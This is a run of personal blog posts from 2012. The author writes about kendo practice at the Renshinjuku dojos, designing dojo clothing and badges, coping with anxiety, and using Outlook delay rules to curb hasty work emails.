As I mentioned earlier today, I've designed a bunch of clothes for the Renshinjuku Kendo dojo. I originally started work on these designs sometime in january and gave it a fresh start with renewed vigour after designing the Renshinjuku Almere logo. My original goal was to have some RSJ-branded sports gear for my running practice, but after finishing the first designs I decided to set up a shop for all RSJ members. I've been dealing with Spreadshirt for a few years now and I've always been very happy with their work, so logically the shop's run by them.

For each design, there are four versions: one for Amstelveen, one for Almere, split into ladies' and gentlemen's fit. The full range of clothes consists of...

Shown above are the sports shirt (white) and the normal t-shirt (grey).


kilala.nl tags: , ,

View or add comments (curr. 0)

It's nice to see my handiwork in real life

2012-04-19 07:15:00

Badges for our dojo

This morning I received an email from Heeren-sensei, the founder of our kendo dojo. A few weeks back I'd sent him the vector files I'd made for the Amstelveen and Almere dojo logos. After discussing the matter for weeks and months I designed the Almere logo, based on the Amstelveen original and after a few rounds with Heeren-sensei, Ton-sensei nd Peter and Zicarlo sempai we'd come to a design to everybody's liking.

Now... That email contained a sample of badges that Heeren-sensei is having sourced from Pakistan, based on the vector files I put together. I'd lie if I said I wasn't at least a little proud (^_^;) IMNSHO, the badges look awesome! If I can I'll order at least three badges: one for my gi, one for my next gi and one for a sweater.

Oddly, I seem to have forgotten to post photos of the clothing I've designed. I'll do that RSN. I've had some great compliments from students and teachers alike :) Bob and Nick were so darn happy last saturday, strutting their stuff in the dressing room. I have to admit, those vests really are soooo soft <3


kilala.nl tags: , ,

View or add comments (curr. 2)

Kicking my own ass and then getting it kicked as well

2012-04-18 10:34:00

Over the past few days my mood had been getting increasingly bad. I was on edge, tired and just not relaxing. I think that a lot of that can be attributed to my recent interest in CC:TA. In my earlier blog post I wrote the game was addictive and it is: it'd become too easy to just waste a whole evening staring at that screen. "Let's raid a camp or two. Okay, I'm through my CP, so let's do base maintenance. Okay, now what? 45 minutes before I can anything else. Okay, let's read the forum and do some diplomacy!" And so on. All the reasons why I never got into WoW.

Then, last night I was this -> <- close to skipping kendo practice again, because of my foul mood. And as I sat there, watching the CC:TA screen, already five minutes late for leaving, I decided to quit the game. I'll set up my base so my alliance mates can raid it and then I'm out. Fsck that, I've got plenty of better things to do.It's a fun game, but nothing more than that.

Marli helped me greatly! "Do I need to push you to go?" And so she did. She quickly helped me pack all my gear and sent me on my way to Amstelveen. Gotta love that girl! ( ^_^)

Luckily I was only a few minutes late and I was just in time to join in with the warming up. After that followed kihon, followed by geiko and more geiko. The group was smaller than usual, but there were many high-level kendoka, including three from the dutch national team! I bowed out from the second round of geiko (the last twenty minutes of class) as I was feeling exhausted and was afraid I wouldn't make it back home.

Pointers I received from several of my sempai:

Thanks to Chung-sempai I now also know what a mouse feels like, when toyed with by a cat. During geiko, with every strike of mine, she darted aside and retaliated with two quick strikes and a giggle. I couldn't help but smile, while getting my ass handed to me.

Also, I don't think we've ever introduced ourselves so I don't know his name. One of the young guys who started in bogu only three weeks ago. He clocked me on my elbow with his tsuba. Twice. Hard. Man that hurt! ( ^_^) Arm's fine today, no worries.


kilala.nl tags: , , , , ,

View or add comments (curr. 3)

Yech! I can tell I've been slacking

2012-04-16 09:10:00

My performance in Saturday's class was a disgrace. I can tell that I've been slacking off the past two weeks. I haven't run on a daily basis and I've skipped kendo for a week as well. All of that showed: not half an hour in class did I bow out and join the beginners' group. I couldn't push myself onward. Or is it "didn't" instead of "couldn't"? It could very well be ( =_=)

Right. Aside from my shitty performance, the biggest thing to note is that my timing on ki-ken-tai-ichi is off. Waaay off. My foot work is way ahead of my cutting. Ton-sensei specifically told me to practice this at home very frequently. 

On the good side of things: Bob and Nick were so damn happy with their Renshinjuku clothes! You may recall that I started designing some clothes in January. Those garments have gone through a number of itterations and now they look great! A few people have ordered sets of shirts and sweaters from the Spreadshirt store and so far everyone's happy :)


kilala.nl tags: , , ,

View or add comments (curr. 1)

Anxiety and discouragement

2012-04-03 17:19:00

Last time I went to the Amstelveen dojo, I had an anxiety attack (only a slight one) after being thoroughly exhausted by the training. At the time it wasn't safe for me to drive myself home, so I was lucky to have Martijn with me. That one event has thrown up a barrier for me to go to Amstelveen alone.

Last week I had an excuse not to attend training in the form of my Standby Duty for $CLIENT. This week I was happy to have Peter-sempai come along, so he could be my proverbial savior if things went wrong again. But unfortunately Peter had to call off because of work, so now I am left to face my anxieties.

I do not want my anxieties to stop me from practicing kendo in Amstelveen. But I would lie if I said I wasn't a bit nervous about going tonight. I'm alone, with no alternative driver to take me home.

as I said: I don't want my anxiety to interfere with my training! I'm going tonight, come what may! I'll just have to be smart about it! If I feel that I've overexerted myself, I will stop for the night. And as always I am prepared for problems! I have enou fluids with me, I have dextrose and a snack with me, I always carry a bag for hyperventilation. I'm just as prepared as I could ever be! Nothing to stop me!

Thus ends the pep talk. :)

EDIT:

I went. It went fine. I was a bit tired at the end, but some dextrose helped out. I trained with the beginners' group and served as motodachi for harai-kote practice. Gave me a good chance to practice my posture and kamae. Roelof-sensei remarked that I was way too tense. He also showed me the proper technique for receiving blows in kirikaeshi.


kilala.nl tags: , , ,

View or add comments (curr. 3)

My first kendo demonstration

2012-03-31 12:25:00

Today's kendo class was cancelled, because the school hosting our dojo would be open for prospective students. The Nautilus College in Almere is a school specialized in educating children with a background in autism and thus their "open days" are a special thing. Instead of our usual practice, our dojo was asked to provide a small demonstration for parents and students. 

Packing my things in the car, Marli warned me to "don't meet anyone cute, you hear? Last time you gave a demo you came home with a wife!" ( ^_^) Of course, that -is- how Marli and I met almost twelve years ago: an archery demo in Wijk Bij Duurstede. Wow! Twelve years!

Our demo was well received and I quite enjoyed doing it. I actually didn't pay any mind to the audience, focusing on our kendo like I should. It wasn't any surprise that Ton-sensei partnered me with Martijn. After our demo I gifted one of the Renshinjuku shirts I'd designed to Ton-sensei, as a small thank you for all of his lessons. 


kilala.nl tags: , ,

View or add comments (curr. 0)

Learning from my mistakes

2012-03-30 11:13:00

The past month I've been paying more attention to my methods of communicating and of working, all under the motto of enryo: "restraint". Overall I see improvement, but with the help of colleagues I've also recognized a number of slipups. 

A while back I stated a number of targets for myself, after a big kerfuffle at the office. Here's how things have gone so far.

This is by far the easiest target. I've simply refrained from contacting R or any of his colleagues in any way or form. Any work that needs to be done together with them was defered to my colleagues. However, there was also a bit of misunderstanding on my part: this target was not only targeted at R and his team, but also at the other team. So, no less than two weeks after the troubles I made the mistake of contacting E from the other team, which blew up in my face. So, the target's been extended to: "I will refrain from contacting R, E and their teams in any way".

I almost stuck my foot in a hornets' nest yesterday! 

Almost a year ago I helped out one of the big projects going down at $CLIENT to achieve their über-important deadline. It involved some changes to one of our BoKS environments and also involved some programming to change the infrastructure. At the time I was in the lead, but I frequently discussed the matter with R to make sure things would work properly. The project met its deadline "and there was much rejoicing".

Now, there's a follow-up to the project which requires more programming to change the infrastructure. The project team defaulted to contacting me about it, as I'd been in the lead last time. Falling back into my old project-mode I quickly joined up and started discussing the matter. It was only when one of my colleagues remarked that R was also working on the programming that I remembered that this programming officially falls under R's team's responsibilities. And thus I came this -><- close to breaking this target! So many thanks to my colleague Rishi for jogging my memory! ( ^_^)

This has gone well! We've had a few problems and incidents that require cross-department cooperation in order to troubleshoot and solve the issue. In each of these cases I've drawn up complete reports of my findings and methods, which I then transfered to one of my team members. I urged them to go over my work, to make sure I didn't make any mistakes and to add to it, so they could then continue working on the project with R's and E's teams. 

One of the biggest things I did to achieve this goal was to build a filter into my Outlook mailbox: all of my email will be delayed by an hour, for re-reading and adjustment, to prevent foot-in-mouth situations. That is, unless I go out of my way to tick a certain box that says "send this email right now" (which is, in three minutes).

This has gone reasonably well, although I find that it's too easy to make the six clicks required for the "send immediately" option. I need to use this frequently when I'm on a specific shift, but I've also found myself using it with normal emails. That's not good and in one case it led to an illworded email making it to a customer. I discussed the matter with my colleague Tommy, who pointed out a few things to remind me of my own goals: it's better to phone than to email and never send emails when you're agitated

And that's the key in this case: it happened when a customer had crossed a number of security guidelines in a rather blatant manner, which I felt needed to be dealt with quickly. My bad: I should've sat on my email a bit, reread it and then phoned the customer to call a meeting. Live and learn.

I've not confered with my colleagues often enough in this regard. Sure I've asked them a few times, when I was in doubt... but I'm not in doubt often enough! (;^_^)


kilala.nl tags: , ,

View or add comments (curr. 0)

An epiphany during home training

2012-03-27 21:35:00

This week Martijn and I will be training at home a few times, 'cause we'll be missing the Amstelveen and Almere training. Tonight I grasped two important things, thanks to him.


kilala.nl tags: , ,

View or add comments (curr. 2)

"Survival of the fittest", he said...

2012-03-21 20:27:00

The day before yesterday, Heeren-sensei taunted me on Facebook warning that class was going to be "survival of the fittest". I had no idea what that meant, but was sure it was going to be hard work. Well, he didn't lie! Because last night's class was really something else!

After warming up we were told to form pairs with someone of comparable height and fitness. Naturally, Martijn and I teamed up: we're just as tall and out-of-shape and we're bonded through our Almere dojo. What followed was 45 minutes of "interval training", as Jouke called it. We would be taking turns in various exercises meant to completely exhaust our arms and shoulders.

I'm really quite hazy about last night's details, so I might've missed a step here or there. I went to bed immediately when coming home, so I didn't even make notes!

As I mentioned, the whole point of this gruelling exercise was to exhaust us up to a point that we couldn't do anything but efficient kendo. With our arms so tired we just have to be relaxed and we have to do proper striking. Jouke repeatedly asked us to memorize the feeling of all of this, so we could try and emulate it later. 

For the last half hour of class we did jigeiko. I faced three people, including mr vd Velde and Raoul-sempai. I'm very sorry to say that I've probably forgotten some of the important points.

Raoul-sempai took his time with me. Instead of full-on geiko, he told me to strike and that he'd let me through if it looked like a good strike. He primarily coached me on my small strikes and fumikomi

By the end of class and in the shower I was feeling completely drained. In the dressing room I sat there, slunk a bit. While I was having a chat with Heeren-sensei I got faint and got a panic attack. Luckily I manage to nip that in the bud, by using breathing exercises. Thank $DEITY Martijn was with me, so he could drive us both home. 


kilala.nl tags: , , ,

View or add comments (curr. 2)

What a great class today!

2012-03-17 16:55:00

Kendo was awesome today :) There was a turnup of roughly eighteen people. 

As usual we started off with kata practice. Today I had the pleasure of training with Bobby. I say pleasure, because in kata we make a good connection. What we lack in form, we make up in the mental aspect. We lock eyes and properly go through the "dialogue" that kata are. 

Footwork training got expanded again and I'm glad we did this! Four laps of suri-ashi, two laps of double men-uchi, one lap of suri-ashi with the shinai stuck through our legs to keep proper distance. Then two laps of repeated men-uchi and one lap of continous men-uchi. In the final three rounds, my suri-ashi went out the window again. :(

Kris tells me that I swith to ayumi-ashi (e.g. "walking"), which messes up my rhythm completely. The stupid thing: I don't even notice the switch! In my head I'm still doing the sliding footwork, and I don't even notice that I'm not sliding anymore. So weird! The fact that I'm putting my left foot in front confuses the rest of my body and messes up the timing of my strikes. I'm glad that Kris pointed this out, so now I can pay more attention to it. 

Like last time we then switched to kihon practice, with all beginners on one side and the kendoka in bogu on the other. As motodachi we kept receiving the strikes that the bogu-less folks threw at us. Big men strikes, small men strikes, big kote-men and small kote-men. Twelve rounds in total I believe. We then split the group up, where the beginners went with Ton and we went with Kris for waza practice. 

Small men strikes, then men-hiki-men, then men-hiki-men-hiki-kote, then men-hiki-kote-hiki-do. With the last one I really started getting confused on the timing and the steps; for every do strike my distance was too large to even hit. I think I realized why: when going back from tai-atari I kept doing step-back, fumikomi-hiki-kote, fumikomi-hiki-do. I shouldn't do the step-back! Even worse: the step-back was a weird bounce :(

Finally we did oji-waza, where motodachi strikes a small men and kakarite can do anything he want. In my practice rounds, in most cases I failed to land a retaliating strike; I only deflected or evaded :(

To close our private practice we did jigeiko, where I went up against Martijn. That's been a while! :) The others remarked that we completely lacked any tension and conviction. In most cases we struck and immediately sunk into tai-atari, instead of doing zanshin (like Kris remarked last week!). Then we slunk backwards and tried weak slaps. All in all we were messy and we've got a long way to go. I don't mind, I'm looking forward to learning over the next few years! :)

Class ended with with uchikomi geiko, where Kris demanded that everyone do their kiai continuously. No stops, no short kiai, just continuous. After my first round he made me go back, because I kept stopping to breathe after each hit. So I got to do three rounds! /o/

Great stuff! I was hyped after class! I even think I'm improving in my stance a little bit, because I don't have those killer muscle aches in my neck and arms anymore ^_^


kilala.nl tags: , ,

View or add comments (curr. 0)

The long road ahead: ken-tai-ichi

2012-03-14 21:38:00

One thing I forgot to mention in my last kendo post, was something Kris mentioned during debriefing: he sees many of us blocking all the time, without going on the offense. To paraphrase: "Sure, blocking blows is fine and it's easier than you'd think... but it sure makes for damn boring kendo!"

Today I was reading through Kendo World 5.2 (hooray for Kindle on iOS!) and ran into an article which went into what Kris described a bit deeper. Quoting from 'The greater meaning of kendo' (part 12), by prof. Oya Minoru as translated by Alex Bennett:

"'Ken-tai-itchi' refers to the inseparable combination of attack and defense. Ken refers to offense and tai to defense. The concept is also called 'ken-chu-tai' (offense exists within defense) and 'tai-chu-ken' (defense exists within offense). […] Whether blocking, deflecting, parrying, or striking down, you must also follow with a cut or thrust. The attacking sword is simultaneously one that protects. Defense is for the purpose of attack, and attack also forms defense."

Right now I know I should be doing it this way, but at this moment simple defense is ingrained in my instincts. But with a lot of training I sincerely hope to reach a point where ken-tai-ichi becomes natural.


kilala.nl tags: , ,

View or add comments (curr. 2)

Learning points from yesterday's class

2012-03-11 19:29:00

Yesterday's class was as usual: kata, warmup, ashi-sabaki, kihon, waza, geiko. Two things were out of the ordinary: the footwork training included 2x2 lengths of continuous men-uchi and the kihon practice pitted bogu-less kendoka against those in bogu who were constantly serving as motodachi

Serving as motodachi I was happy to see that I've built enough experience to at least notice basic problems in my opponents. So those were aspects that I tried to really help them out with: point it out and encourage them to work on it. So, that's them. How about me? Plenty of stuff!

In the debriefing Kris also forwarded a message from the jurors at the NK kyu/teams. It echoed a lot of the things that I've written about before: our grasp of etiquette and procedure sucks and our kendo really isn't up to snuff. Kris and Hillen indicated that they could be stricter with us as a group, but that won't cut it; it needs to go both ways! We all need to be involved and have a stake in our team.

So, after all of that Sander and I made a pact. From here on we'll be the stern voice in our ranks, despite the fact that we're only ranked in the middle of our group. Whenever people are chatting or slacking, we'll remind them to stay attentive.

EDIT:

With regards to pointing out perceived issues in other people's kendo: as Marli has warned me, I probably shouldn't. I'm nowhere near the position to do so and thus it falls under the same category as before: just shut up. Sensei and fukushou will undoubtedly mention the same things, so I should just butt out. As the Madison Kendo etiquette guide says: "Never instruct others unless you have been told to do so by the lead instructor. It is important to let less experienced participants learn by observation and improve their reaction speed. They will learn faster by doing it than by having someone tell them how to do it."

I just realized that my "helping" others in this case was becoming a matter of pride. That -really- has no place in kendo. "Shut up" is the motto from now on.


kilala.nl tags: , ,

View or add comments (curr. 2)

A humbling experience in Amstelveen

2012-03-06 22:31:00

As awesome as last week's training went, so humbling was today's experience. Not even into the fifth round of kihon practice I had to bow out. I simply couldn't lift my shinai anymore and was out of breath. I tried to push myself during the fourth round, which is why I made it through the fifth one, but after that I was gone :(

The first two rounds were kirikaeshi, which went alright. In the first one my partner unexpectedly had strikes like a mallet, so my men took some rocking and shaking! Rounds three through five were men-strikes, without end: A does three, B does three, lather-rince-repeat. That's when I bowed out. After gathering my gear and commiting my first faux pas of the evening (sitting down while others practice), Roelof-sensei quickly pulled me into the beginners' group. 

With the beginners' group we practiced men-strikes and dou-strikes. First starting with the left foot and passing left. Then starting in normal kamae, but still passing left. And finally the dou strike as we're used to. 

There were plenty of things that were just plain wrong.

I am -very- glad that I joined the Amstelveen group for the tuesday night! Not only is it highly educational, but it helps me find more and more flaws in my kendo. And of course it's just great exercise. With regards to my stamine, Marli rightly points out that "well, maybe you should just start lifting those damn weights and run more!". When she's right, she's right ^_^


kilala.nl tags: , ,

View or add comments (curr. 6)

More analysis of my kendo technique

2012-03-01 23:00:00

KendoFeb2012.m4v

Last year I saw the benefit of filming my kendo practice, so find weak points in my technique. I learned a lot from that. Tuesday, my first lesson in Amstelveen, Peter-sempai came along and filmed a little of my warming-up. I'm very grateful that he did this, because the clip above serves as a reminder of things I've been doing wrong for quite some time. 

In the second part of the clip (kirikaeshi) I'm the middle one, with his back to the camera.

The clips show plenty of stuff I like as well. The movement of my left fist isn't bad and I do believe my fumikomi is improving a little :)


kilala.nl tags: , ,

View or add comments (curr. 2)

Forcing restraint in email: message delays and reminders

2012-03-01 18:11:00

A warning message in your email template: be careful what you write

Last week I made a few resolutions for myself regarding communicating at work. These resolutions were reaffirmed today, in a meeting with my manager and are now stated thusly:

In order to help myself stick to these resolutions I've made a few configuration changes to my Outlook email client. These are by no means guarantees that I will improve, but they serve as stern reminders that my mindset needs changing. 

Every email I start writing, whether it's a reply or a new message, is filled with a big warning template asking me "Are you really using email? Wouldn't it be better to phone?". It also reminds me to "Watch your phrasing! Are you CCing people?". I couldn't find a way in Outlook to set up a template or standard email to do this, so I've adjusted my email signature to serve the purpose. 

I have also set up two filtering rules to delay my outgoing messages. With many things to How-to Geek's 'Preventing OhNo! after sending emails'.

  1. Apply rule to mail I send: assigned to category "CHECKED", delay delivery for 2 minutes and stop processing rules.
  2. Apply rule to mail I send: assign mail to category "NEED TO CHECK" and delay delivery for 60 minutes, except if mail is assigned to category "CHECKED", or if message is invitation or update.

 

The second rule determines that every single email i send will be delayed for an hour. This will prevent many foot-in-mouth situations and will also force me to review my message. Each of these messages gets classified as "NEED TO CHECK", unless I specifically go out of my way to set the message to "CHECKED". All messages marked as "CHECKED" will be delayed for only two minutes, after which they'll go on their way to the addressee.

I will also add an hourly reminder to my agenda to prompt myself to review all pending emails.

My manager indicated upfront that these changes will drastically lower my throughput at the office. Part of the reason why I'm so damn fast with our ticket queue is because my over-reliance on email: fix an issue, inform client through email, BOOM! next ticket! I have to admit that I felt a few pangs of OCD at this realization, because I always worry about our ticket queue. We're already behind on our work, so if I'm going to get slower we'll only get behind further. Luckily my manager takes this for granted, as she feels that fixing my communications issues is more important than our current workload. Wow!

I'm quite hopeful that these measures will aid me in improving my communications at work. Right now I still need external stimuli to practice enryo

EDIT:

Sadly there is no way of implementing the second set of precautions in Apple's Mail.app. The software does not support rules on outgoing email without the support of Mail ActOn and even then it only allows such things as filing the sent message. It will not allow delays or forcing messages to be saved as drafts. 

Because of this I tried to give Thunderbird a shot, but I still hate that piece of software. I can't help it. Alternatively I think Sparrow looks great, but I don't think it has the options I'm looking for. Even Entourage 2008 doesn't appear to support the kind of rules I'm using in Outlook 2003 at the office ;_; 

In the end I implemented my 'helpers' in Mail.app by:

  1. Adding a default signature, just like the one described above. 
  2. Remapping shift-command-d (Send message) to save the message as a draft.

kilala.nl tags: , , ,

View or add comments (curr. 2)

A change to my training schedule

2012-02-28 22:36:00

From this week onward I will be training kendo twice a week: saturday morning at Renshinjuku Almere and tuesday evening at Renshinjuku Amstelveen. Tonight was my first class in Amstelveen and I'm very grateful to a bunch of people. I'm thankful to Peter-sempai for coming along as moral support. I'll readily admit that I was a bit nervous about going to a completely new group, so it helped to have a friendly face in the first hour. And of course I'm grateful towards Heeren-sensei and everyone in the group for the warm welcome. It felt like I'd been training with them for a while already :)

Most notably, I'm thankful to Marli! She's the one who pulled the trigger on this decission!

After witnessing us at the NK Teams and after hearing some of my thoughts, she basically said that "if you really want to become serious about both kendo and the discipline that comes with it, then you're going to have to train with another group". Me being a stupid-head I originally understood that to mean "leave Almere and go elsewhere", but that's not what she meant. She meant: train more and with other groups. Wow! I'm so lucky that she's actually the one pushing me to go do kendo twice a week :)

Now... Class schedule at Amstelveen is a bit different. Almere usually does kata, warming up, footwork, kihon+waza and geiko. Tonight's schedule was warm up, then an hour of kihon+waza and half an hour of geiko. Heeren-sensei indicated that this does shift around a bit, depending on the crowd that comes in. One particular aspect that I enjoyed was the personal involvement ('hoofdelijke aansprakelijkheid') during the debriefing. Heeren-sensei asked a few of the kendoka how they have been using the waza that we practiced in their geiko and if they succeeded (and if not, why not). "How often did you do harai waza? Did it work? Why not? When would you best use harai waza?" (the answer turned out to be "when your opponent has become weak in his arms")

Things that were pointed out for improvement:

I'm very happy about the fact that I did pay more attention to my fumikomi! I was conciously trying to make improvements in that! Also, I used my bogu for the first time this evening and I'm very, very happy with it! I still need to break in the kote, but every piece of the kit feels comfortable and suits me perfectly.

A great night! And now I'm off to bed!


kilala.nl tags: , ,

View or add comments (curr. 5)

NK kyu grades: dutch national championship for kyu graded individuals

2012-02-20 16:37:00

The day at the dutch national kendo championships started with the NK for kyu graded kendoka: those "beginning" players who have not yet graded for the first dan (anyone below black belt, would be the karate parallel). Realistically this means pitting folks against each other with 0-4 years of kendo experience. Five players from Renshinjuku Almere had registered and each was placed in a different poule.

Nick and I were on field A, in poules 4 and 5, while Houdaifa, Tiamat and Martijn were in poules 1, 2 and 3. I recall that Houdaifa made it through to the second round, but got bumped out after that. Tiamat, Martijn and I didn't make it through the first round. Nick managed to place third in the whole championship. Good going Nick! /o/

I'll come out and say it right now: my performance was awful, mostly due to my mental state. I went into this completely wrong, forgetting everything I've learned about kendo over the past year. 

It is often said that a kendo is a dialogue between two warriors. They speak through their shinai and bodies, thus determining who will strike when the time is right. Simply trying to overpower your opponent will almost never give proper results. And yet, that was exactly what I was trying to do: I was trying to assert my own will over my opponents. In my mind, I had a point to make: "I may be a rookie, but I won't be overpowered by you! Here! Have at you!" And thus I would immediately launch into an ill-advised attack. 

Within fifteen seconds from the starting command I would force myself forward, predictably aiming for kote. Whether there was an actual opening, whether my kamae or maai were right, whether I even had a chance? I didn't take any of that in and I simply attacked. So very, very wrong. 

In both cases I was out within fifteen to twenty seconds, with four nicely places men-strikes against. In both cases I thanked my opponents for an educational experience, whose lesson I would only figure out later that evening. 


kilala.nl tags: , ,

View or add comments (curr. 0)

NK Teams: dutch national championships for kendo teams

2012-02-19 22:06:00

First off, I'd like to give special thanks to Kris-fukushou for his guidance during our day at the NK kendo! It was a huge support for us newbies, to have him take some time away from Museido Dojo and to coach us. Thank you Kris! Also a hearty congratulation to Museido for winning third place and to our mother-dojo Renshinjuku Amstelveen for winning first place!

Originally I was going to take part in the NK Teams as part of the Renshinjuku Almere team, but that took a turn. There were six of us and because Jeroen hadn't fought today, I offered him my spot on our team, putting myself in the reserve seat. It's good that I stuck around, because Kris was approached by a member of the jury, asking about Houdaifa's age. Turns out that the age limit for the NK Teams isn't 16, but 18! Which meant that I got switched in for our second competition in our poule. 

I went up against mr Weber or Arnhem's Kendo Kai Higashi. Luckily I lasted longer than my two fights in the NK Kyu. I went down with two men-strikes against me, plus one loss of my shinai which was flicked away when defending against a very strong men-strike. Learning points:

Then, as for our team? I'm sad to say that, honestly, we were not a team. We were six kendoka who train together and who spent the day together. We were the least experienced team and it showed. 

Nothing but good about the fighting prowess of my sempai! I'm greatly impressed with how they all did and I will have plenty to learn from them in the years to come! And our attitude amongst eachother is great! We're a positive and friendly group! However, outside of the fighting we weren't very good. We have a lot to learn about order and displine. 

During the day I was too overwhelmed by the spectacle of it all, but afterwards I'm honestly a bit ashamed. 

Ton-sensei, Hillen-fukushou and Kris-fukushou say it often: training once a week is not enough. By only spending two hours a week together we barely have enough time for basic training and some geiko. Let alone time to learn etiquette and equipment maintenance! If there was a chance to train twice a week with our dojo, I'd jump at the chance! And I'd love to help in any way needed to set it up! Heck, I'm already training several sempai in the maintenance of their gear!

Tomorrow I'll take some time to write about the rest of the day and my participation in the individual NK for kyu-graded kendoka.


kilala.nl tags: , ,

View or add comments (curr. 2)

An awesome outing: NK kendo

2012-02-19 20:15:00

Packing all my gear

Today was an excellent day!

I'd packed all my stuff yesterday, making sure to take along enough food and drinks for myself and one other person. You never know who gets hungry, but forgets to bring food or money. It barely fit into my kendo bag! :D

In the morning I got a bit anxious about my family being home alone, what if something'd happen and Marli couldn't make it to a phone? You know, the general anxiety stuff I live with. I'd taken care of all other possible worries I might have, but this one stuck. So Marli spoiled a surprise she'd prepared! She'd arranged for our good friend Michel to pick up her and our daughter, so they could come and watch too. Awesome! I'm so grateful for Michel's help!

I picked up Tiamat and Kris-sempai at Almere station at the appointed time: 0845. We then made our way to Zwolle, arriving nicely in time. We made some small talk with our class mates and got dressed. Kaijuu also showed up around that time, so that was a nice reassurance for me: one of my best friends would be sticking around all day!

The sports hall at Landstede is awesome! A huge wooden floor, with nice lighting and good seating provided a great arena for our tournament.

Shinai checking occured at 1035 and both my shinai passed muster. We found out our poule arrangement for the individual tournaments and also ascertained when our dojo would fight in the teams compo. Finally, we were a bit late getting started with the warming up. All the other groups were ahead of us, so we hurried it a bit. I have to say: I always thought our groups kiai during warmup to be nice and loud, but boy do other teams have wonderful kiai! I don't know who they were, but wow! It was like thunder rolling in!

You can read about my participation in the individual matches here.

Once I was out of the kyu grades compo I had lunch and talked with my family. The girls had arrived before I got started and my father also made it in time. So cool! I'm so grateful for such supportive family and friends! I did my best to study Nick and his opponent in Nick's final fight. That was a great fight!

You can read about my participation in the teams matches here.

All through the day our kid's been a champ! She had talked and played with Marli, grandad, Kaijuu, Michel, Christa and with a few kendoka. By the time I was ready for the team matches she'd fallen asleep in Marli's lap, being completely worn out. This is why I decided to pack up and get changed right after the match. I thanked my opponent, did a quick review with my team mates and headed for the dressing room. 

We went home with Kaijuu (Kris and Tiamat hitched a ride with Peter), so Marli could get a tour of his new digs. I was also completely worn out, falling asleep at least once. Odd, how a busy day with only one real fight could wear me out so profoundly.

We then went for dinner at Itoshii. It was bloody brilliant! They charge E24 for five rounds of dinner, each round allowing you three to four small dishes. By round three I'd had my fill of some great food: udon noodles, gyoza, curry rice and plenty of good meats. Kaijuu and Michel also seemed to enjoy their sushi a lot. Really great stuff!

By the end of the evening we also got to meet Kaijuu's girlfriend Natalie. Sweet girl! <3 I'm looking forward to having an actual talk with her, instead of half-sleeping, half-minding our daughter ;)

Image source.


kilala.nl tags: , ,

View or add comments (curr. 0)

A rather unimpressive performance

2012-02-18 15:23:00

some sketches for kata 3 and 4

First off, I'm rather disappointed with my own performance in class today. After only a few rounds of kihon practice my head was spinning and I lost all sense of power in my arms. Like I was completely empty. Fifteen minutes later I was mostly fine again, which to me suggests that I need to do two things: properly dose my power output and build more and more endurance. 

Today's class revolved around shiai practice, that is to say: preparing for tournaments. Tomorrow a team from Renshinjuku Almere will be attending the dutch national championships. Nick, Jeroen, Houdaifa, Tiamat, Martijn and myself will travel to Zwolle to compete in two competitions. Each of us will participate in the individual competition for kyu-grade kendoka and the six of us will also form a team for the NK teams competition. The latter will be quite a challenge as we'll be going up against both kyu and dan-graded kendoka!

As usual, class was started with kata training, which I did with Nick. A great experience, as both Nick and Ton-sensei showed me a few eye openers. Two of these are sketched above; left is correct, right is wrong.

  1. In kata #3, after the opening thrust by uchidachi, shidachi thrusts back. When doing so I used to move my arms in such a way that the bokken would become level, to stab the torso of uchidachi. I was now taught that the bokken should actually remain diagonal in a straight forward movement. The theory behind it being that it would not stab, but cut the torso.
  2. In kata #4, after stepping forward both kendoka strike men, to cross bokken at eye level. Uchidachi move in hasso-kamae, while shidachi moves in waki-gamae. When making the strike from waki-gamae I used to make a circular arc, while the bokken should actually be lifted straight upwards, after which an arc is made.

When it comes to footwork I stuck to my training goal for 2012 and focused on fumikomi. Part of this was achieved by also focusing on my pelvis. My natural stance (which really is bad posture) gives me a hollowed back and my tush tilts backwards. Today I really focused on keeping my pelvis tilted forwards, which worked miracles for my stance.

I'm really curious about tomorrow! It'll be a long, long day... I'll be away from home from 0830 until 1830. Ouchie.


kilala.nl tags: , ,

View or add comments (curr. 1)

Conquering myself: anxiety and restraint

2012-02-16 07:16:00

enryo

Starting this week, my desk at the office has been rearranged somewhat. All of my gear's been moved to the right, thus providing unihibited view of the divider board. This board is now adorned with a piece of A5 paper, bearing the kanji shown left: enryo, 遠慮(picture source).

Enryo is the Japanese concept of (and word for) restraint. The kanji consists of the words for distant and prudence.

I've chosen this word as my mental goal for this year, next to my physical education goal of fumikomi. Why? Because restraint will help me both at work, in kendo and in my anxieties. At work, because I've repeatedly gotten in trouble for being too hasty. In kendo, because I show way too much of what goes on in my head. In my anxieties, because control over mind and body will aid in preventing and fighting panic attacks.

Here are two excellent articles about the concept of enryo in Japanese culture:

Speaking of my anxiety disorder. I visited my therapist again yesterday and he's quite happy about my progress. He was disappointed that I had not continued with the progressive relaxation exercises, but was glad that I'd replaced them with concepts from kendo and tai chi. From here on I will be setting exposure goals for myself, where I simply go out and expose myself to situations I loathe, of ever-increasing difficulty. We will meet up only once more after this, after which my therapist is confident that I can continue the training on my own.

Finally, just to keep track of stuff: in the middle of the night I had a mild bout of hyperventilation.


kilala.nl tags: , , , ,

View or add comments (curr. 2)

Miyako Kendogu: free and fast shipping

2012-02-14 11:11:00

Shipping status with UPS

A little while ago Marli ordered a beautiful set of bogu for me, from Japan. I was already impressed with Miyako Kendogu's service insofar that they provide both spectacle adjustments and worldwide shipping free of charge. But now I'm even more impressed because this free shipping is actually UPS Worldwide Saver! Meaning that the parcel will arrive in the Netherlands within three working days! Wow!

It makes me giddy to know that I'll probably be wearing my new bogu this weekend! ^_^


kilala.nl tags: , ,

View or add comments (curr. 1)

Kendo kyu exams at Renshinjuku Almere

2012-02-04 14:48:00

Ten months after our dojo's previous exams we held kyu-grade exams today. This time around the group of people was a lot smaller, but things were still just as chaotic as last year. First off I started putting on my bogu, while we were not supposed to wear it during the exam. Then I had my zekken on, which was supposed to be off. Then I'd forgotten to switch to my kendo glasses. And finally, minutes before my test, I discovered that I was still wearing my wedding ring! Messy =_=

Today we had one person testing for fifth kyu, three for fourth (including myself) and three for third. The exams were as follows:

In general I thought my test didn't go badly and I was feeling more confident than during my first exam. However, there was plenty of stuff that wasn't great. Sensei tells me that I graded for fourth kyu, but that third kyu would require a lot of hard work.

The biggest problems seen in my kendo today were:

Martijn also remarked that, while my kiai sounds good, it's not supported by focus or strong body language.


kilala.nl tags: , ,

View or add comments (curr. 0)

Unseen inspiration: tenugui

2012-02-03 19:50:00

tenugui with skeleton

In kendo practitioners generally all look the same. With some exceptions, everyone wears a dark blue uniform and a mostly black bogu. Some people have a differently coloured do-dai, like red or blue or hot pink :p But overall one can say there's little to no space for personalization. 

